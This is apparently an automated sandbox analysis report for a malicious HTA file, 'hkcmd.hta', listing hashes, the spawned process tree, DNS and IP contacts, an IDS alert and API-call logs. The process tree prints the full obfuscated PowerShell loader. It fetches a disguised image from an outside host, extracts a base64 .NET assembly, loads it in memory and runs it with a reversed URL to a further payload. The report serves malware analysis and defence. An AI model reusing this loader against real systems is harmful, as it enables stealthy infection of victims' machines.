popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

hkcmd.hta

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6403_us Sept. 13, 2023, 9:38 a.m. Sept. 13, 2023, 9:40 a.m.
Size 173.0KB
Type HTML document, Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5 ba271568b611cfbc62dca1fc2d2e8bf3
SHA256 3f2d25198bef9f574332ba7aea3e1c95aab05e7e5c6404a4364c578b3199d11a
CRC32 013523BF
ssdeep 768:vMg7JMsMN00BQkMWsYd3hBIsBu8Q8yUotU7UfeR2CkSD8Vu:vMg7JMsMz7hBYsU8Q8yUeU7UfeR2CP
Yara None matched

  • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\hkcmd.hta.html

    1960

    • iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:1960 CREDAT:145409

      2108

      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J€€Bp€€G0€€YQBn€€GU€€VQBy€€Gw€€I€€€€9€€C€€€€JwBo€€HQ€€d€€Bw€€HM€€Og€€v€€C8€€dQBw€€Gw€€bwBh€€GQ€€Z€€Bl€€Gk€€bQBh€€Gc€€ZQBu€€HM€€LgBj€€G8€€bQ€€u€€GI€€cg€€v€€Gk€€bQBh€€Gc€€ZQBz€€C8€€M€€€€w€€DQ€€Lw€€1€€Dg€€Mw€€v€€DQ€€MQ€€x€€C8€€bwBy€€Gk€€ZwBp€€G4€€YQBs€€C8€€a€€B0€€GE€€LgBq€€H€€€€Zw€€/€€DE€€Ng€€5€€DI€€Ng€€1€€Dg€€Mg€€y€€Dk€€Jw€€7€€CQ€€dwBl€€GI€€QwBs€€Gk€€ZQBu€€HQ€€I€€€€9€€C€€€€TgBl€€Hc€€LQBP€€GI€€agBl€€GM€€d€€€€g€€FM€€eQBz€€HQ€€ZQBt€€C4€€TgBl€€HQ€€LgBX€€GU€€YgBD€€Gw€€aQBl€€G4€€d€€€€7€€CQ€€aQBt€€GE€€ZwBl€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€€€k€€Hc€€ZQBi€€EM€€b€€Bp€€GU€€bgB0€€C4€€R€€Bv€€Hc€€bgBs€€G8€€YQBk€€EQ€€YQB0€€GE€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBV€€HI€€b€€€€p€€Ds€€J€€Bp€€G0€€YQBn€€GU€€V€€Bl€€Hg€€d€€€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€V€€Bl€€Hg€€d€€€€u€€EU€€bgBj€€G8€€Z€€Bp€€G4€€ZwBd€€Do€€OgBV€€FQ€€Rg€€4€€C4€€RwBl€€HQ€€UwB0€€HI€€aQBu€€Gc€€K€€€€k€€Gk€€bQBh€€Gc€€ZQBC€€Hk€€d€€Bl€€HM€€KQ€€7€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBT€€FQ€€QQBS€€FQ€€Pg€€+€€Cc€€Ow€€k€€GU€€bgBk€€EY€€b€€Bh€€Gc€€I€€€€9€€C€€€€Jw€€8€€Dw€€QgBB€€FM€€RQ€€2€€DQ€€XwBF€€E4€€R€€€€+€€D4€€Jw€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€D0€€I€€€€k€€Gk€€bQBh€€Gc€€ZQBU€€GU€€e€€B0€€C4€€SQBu€€GQ€€ZQB4€€E8€€Zg€€o€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€KQ€€7€€CQ€€ZQBu€€GQ€€SQBu€€GQ€€ZQB4€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBJ€€G4€€Z€€Bl€€Hg€€TwBm€€Cg€€J€€Bl€€G4€€Z€€BG€€Gw€€YQBn€€Ck€€Ow€€k€€HM€€d€€Bh€€HI€€d€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€ZQ€€g€€D€€€€I€€€€t€€GE€€bgBk€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€Gc€€d€€€€g€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€7€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€g€€Cs€€PQ€€g€€CQ€€cwB0€€GE€€cgB0€€EY€€b€€Bh€€Gc€€LgBM€€GU€€bgBn€€HQ€€a€€€€7€€CQ€€YgBh€€HM€€ZQ€€2€€DQ€€T€€Bl€€G4€€ZwB0€€Gg€€I€€€€9€€C€€€€J€€Bl€€G4€€Z€€BJ€€G4€€Z€€Bl€€Hg€€I€€€€t€€C€€€€J€€Bz€€HQ€€YQBy€€HQ€€SQBu€€GQ€€ZQB4€€Ds€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€C€€€€PQ€€g€€CQ€€aQBt€€GE€€ZwBl€€FQ€€ZQB4€€HQ€€LgBT€€HU€€YgBz€€HQ€€cgBp€€G4€€Zw€€o€€CQ€€cwB0€€GE€€cgB0€€Ek€€bgBk€€GU€€e€€€€s€€C€€€€J€€Bi€€GE€€cwBl€€DY€€N€€BM€€GU€€bgBn€€HQ€€a€€€€p€€Ds€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€QwBv€€G4€€dgBl€€HI€€d€€Bd€€Do€€OgBG€€HI€€bwBt€€EI€€YQBz€€GU€€Ng€€0€€FM€€d€€By€€Gk€€bgBn€€Cg€€J€€Bi€€GE€€cwBl€€DY€€N€€BD€€G8€€bQBt€€GE€€bgBk€€Ck€€Ow€€k€€Gw€€bwBh€€GQ€€ZQBk€€EE€€cwBz€€GU€€bQBi€€Gw€€eQ€€g€€D0€€I€€Bb€€FM€€eQBz€€HQ€€ZQBt€€C4€€UgBl€€GY€€b€€Bl€€GM€€d€€Bp€€G8€€bg€€u€€EE€€cwBz€€GU€€bQBi€€Gw€€eQBd€€Do€€OgBM€€G8€€YQBk€€Cg€€J€€Bj€€G8€€bQBt€€GE€€bgBk€€EI€€eQB0€€GU€€cw€€p€€Ds€€J€€B0€€Hk€€c€€Bl€€C€€€€PQ€€g€€CQ€€b€€Bv€€GE€€Z€€Bl€€GQ€€QQBz€€HM€€ZQBt€€GI€€b€€B5€€C4€€RwBl€€HQ€€V€€B5€€H€€€€ZQ€€o€€Cc€€RgBp€€GI€€ZQBy€€C4€€S€€Bv€€G0€€ZQ€€n€€Ck€€Ow€€k€€G0€€ZQB0€€Gg€€bwBk€€C€€€€PQ€€g€€CQ€€d€€B5€€H€€€€ZQ€€u€€Ec€€ZQB0€€E0€€ZQB0€€Gg€€bwBk€€Cg€€JwBW€€EE€€SQ€€n€€Ck€€Ow€€k€€GE€€cgBn€€HU€€bQBl€€G4€€d€€Bz€€C€€€€PQ€€g€€Cw€€K€€€€n€€HQ€€e€€B0€€C4€€Z€€Bt€€GM€€awBo€€C8€€QgBJ€€C8€€Mg€€y€€DE€€Lg€€5€€DM€€Mg€€u€€DQ€€OQ€€u€€DM€€Mg€€v€€C8€€OgBw€€HQ€€d€€Bo€€Cc€€KQ€€7€€CQ€€bQBl€€HQ€€a€€Bv€€GQ€€LgBJ€€G4€€dgBv€€Gs€€ZQ€€o€€CQ€€bgB1€€Gw€€b€€€€s€€C€€€€J€€Bh€€HI€€ZwB1€€G0€€ZQBu€€HQ€€cw€€p€€€€==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo.replace('€€','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypss -NoProfile -command $OWjuxD

        2620

        • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypss -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/583/411/original/hta.jpg?1692658229';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.dmckh/BI/221.932.49.32//:ptth');$method.Invoke($null, $arguments)"

          2776

Name Response Post-Analysis Lookup
apps.identrust.com
A 121.254.136.9
CNAME a1952.dscq.akamai.net
CNAME identrust.edgesuite.net
A 121.254.136.18
23.67.53.17
uploaddeimagens.com.br
A 104.21.45.138
A 172.67.215.45
172.67.215.45
IP Address Status Action
104.21.45.138 Active Moloch
117.18.232.200 Active Moloch
121.254.136.18 Active Moloch
164.124.101.2 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49176 -> 104.21.45.138:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.103:49176
104.21.45.138:443 		C=US, O=Let's Encrypt, CN=E1 CN=uploaddeimagens.com.br 67:68:c4:e4:aa:54:e1:fd:f0:50:01:73:1e:da:cf:48:0c:17:0d:34

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: False
console_handle: 0x000000000000039f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002173b0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002342a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002342a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002342a0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000234000
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000234000
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217420
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217420
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217420
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0000000000217490
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002178f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002178f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000002178f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc070
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cbcf0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc4d0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc700
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc700
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc770
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5cc770
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f21f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b5f21f0
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x00000000003e7b20
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8320
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8010
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x000000001b2e8390
flags: 0
crypto_export_handle: 0x0000000000000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefdbfa49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefdf373c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7fefe0943bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefdf55295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefdf52799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdffaf1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdffb76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefdf548d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7fefe1c0883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7fefe1c0ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7fefe1c0c43
CoSetState+0x1450 DcomChannelSetHResult-0x34c ole32+0x2a4f0 @ 0x7fefe07a4f0
GetErrorInfo+0x599 ObjectStublessClient7-0xb1f ole32+0x3d551 @ 0x7fefe08d551
CoGetInstanceFromFile+0x78ce HACCEL_UserFree-0x4502 ole32+0x17347e @ 0x7fefe1c347e
CoGetInstanceFromFile+0x567b HACCEL_UserFree-0x6755 ole32+0x17122b @ 0x7fefe1c122b
CoGetInstanceFromFile+0x7992 HACCEL_UserFree-0x443e ole32+0x173542 @ 0x7fefe1c3542
GetErrorInfo+0x475 ObjectStublessClient7-0xc43 ole32+0x3d42d @ 0x7fefe08d42d
GetErrorInfo+0x21e ObjectStublessClient7-0xe9a ole32+0x3d1d6 @ 0x7fefe08d1d6
TranslateMessageEx+0x2a1 IntersectRect-0x11f user32+0x19bd1 @ 0x77259bd1
TranslateMessage+0x1ea DispatchMessageW-0x42 user32+0x198da @ 0x772598da
GetErrorInfo+0xf3 ObjectStublessClient7-0xfc5 ole32+0x3d0ab @ 0x7fefe08d0ab
CoUnloadingWOW+0x117 OleCreateFromFileEx-0x1829 ole32+0x163e57 @ 0x7fefe1b3e57
ObjectStublessClient24+0x1876 CLSIDFromString-0x57a ole32+0x10106 @ 0x7fefe060106
ObjectStublessClient24+0x18f2 CLSIDFromString-0x4fe ole32+0x10182 @ 0x7fefe060182
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76fd652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x776ec521

exception.instruction_r: 48 81 c4 c8 00 00 00 c3 48 85 f6 74 08 83 3b 00
exception.symbol: RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d
exception.instruction: add rsp, 0xc8
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 42141
exception.address: 0x7fefdbfa49d
registers.r14: 0
registers.r15: 0
registers.rcx: 97117264
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 97123216
registers.r11: 97119024
registers.r8: 0
registers.r9: 0
registers.rdx: 1
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1924636213
registers.r13: 0
1 0 0
request GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request GET http://apps.identrust.com/roots/dstrootcax3.p7c
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4132864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002690000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002a80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007725d000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077282000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077264000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000077282000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc7d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefc7d5000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefe4f4000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007feff871000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007724a000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 1960
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002ee0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1960
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fef1af9000
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2108
region_size: 5181440
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000002e80000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffffffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2108
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000003370000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2108
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000772b1000
process_handle: 0xffffffffffffffff
